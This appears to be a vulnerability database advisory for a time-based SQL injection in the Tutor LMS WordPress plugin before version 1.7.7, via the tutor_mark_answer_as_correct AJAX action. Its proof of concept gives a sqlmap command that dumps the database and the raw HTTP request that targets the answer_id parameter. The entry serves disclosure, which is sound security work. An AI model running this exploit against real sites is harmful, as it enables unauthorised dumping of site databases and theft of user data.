WordPress Plugin Vulnerabilities
Tutor LMS < 1.7.7 - SQL Injection via tutor_mark_answer_as_correct
Description
The tutor_mark_answer_as_correct AJAX action from the plugin was vulnerable to blind and time based SQL injections that could be exploited by students.
Proof of Concept
python3 sqlmap.py -r ~/tutortime.txt --dbms=mysql --technique=T -p answer_id --dump Where tutortime.txt is POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [URL] Content-Length: 74 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: [URL] Referer: [URL] Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [COOKIES] Connection: close action=tutor_mark_answer_as_correct&answer_id=1&inputValue=1
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-15 (about 3 years ago)
Added
2021-03-15 (about 3 years ago)
Last Updated
2021-03-20 (about 3 years ago)